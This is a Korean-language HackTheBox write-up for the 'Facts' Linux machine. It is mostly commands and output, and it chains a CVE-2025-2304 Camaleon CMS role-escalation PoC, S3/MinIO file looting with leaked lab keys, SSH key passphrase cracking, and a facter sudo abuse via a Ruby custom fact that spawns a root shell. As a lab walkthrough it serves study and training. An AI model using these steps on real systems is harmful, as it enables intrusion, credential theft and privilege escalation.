
HackTheBox Facts 머신 라이트업 — CVE-2025-2304, MinIO S3 열거, SSH 키 크래킹 및 facter 권한 상승.
| 필드 | 세부 정보 |
|---|---|
| 이름 | Facts |
| OS | Linux |
| 난이도 | 쉬움 |
| 출시 | 시즌 10 |
| 은퇴 | 아니오 |
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root
| 도구 | 용도 |
|---|---|
| Nmap | 포트 스캔 및 서비스 탐지 |
| Feroxbuster | 웹 디렉터리 열거 |
| CVE-2025-2304 PoC | Camaleon CMS 권한 상승 |
| boto3 (Python) | MinIO/S3 열거 및 파일 다운로드 |
| ssh2john | SSH 키를 크랙 가능한 해시로 변환 |
| John the Ripper | SSH 키 패스프레이즈 크랙 |
| facter | sudo 잘못된 설정을 통한 권한 상승 |
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>
결과:
22/tcp open ssh OpenSSH 9.9p1 Ubuntu
80/tcp open http nginx 1.26.3 (Camaleon CMS)
54321/tcp open http MinIO S3 Server
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml
주요 발견사항:
http://facts.htb/admin/loginhttp://facts.htb/admin/registerhttp://facts.htb/admin/register에 접속하여 계정을 생성합니다. 캡차가 있으므로 브라우저를 통해 등록하세요.
updated_ajax 엔드포인트는 permit!을 사용하여 role을 포함한 모든 매개변수 업데이트를 허용합니다.
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e
출력:
[+] Login confirmed
Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
s3 access key: AKIAA5CA83CCFE35CD69
s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
s3 endpoint: http://localhost:54321
포트 54321은 MinIO S3 호환 서버를 실행합니다. 유출된 자격 증명을 사용합니다:
import boto3
from botocore.client import Config
s3 = boto3.client(
's3',
endpoint_url='http://facts.htb:54321',
aws_access_key_id='AKIAA5CA83CCFE35CD69',
aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
config=Config(signature_version='s3v4'),
region_name='us-east-1'
)
paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
for o in page.get('Contents', []):
if 'info-etags' not in o['Key']:
print(o['Key'])
s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))
찾은 주요 파일:
.ssh/authorized_keys
.ssh/id_ed25519 ← SSH 개인 키
.profile
.bashrc
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt
크랙된 패스프레이즈: dragonballz
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
cat /home/william/user.txt
sudo -l
(ALL) NOPASSWD: /usr/bin/facter
Facter는 커스텀 팩트를 Ruby 스크립트로 로드합니다. 루트 권한으로 암호 없이 실행할 수 있으므로 임의의 Ruby 코드를 주입합니다:
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
setcode do
exec("/bin/bash -p")
end
end
EOF
sudo facter --custom-dir=/tmp/facts pwn
루트 셸 획득!
whoami # root
cat /root/root.txt
이 해설은 교육 목적으로만 제공됩니다. 항상 자신이 소유하거나 명시적 테스트 허가를 받은 시스템에서만 보안 테스트를 수행하세요.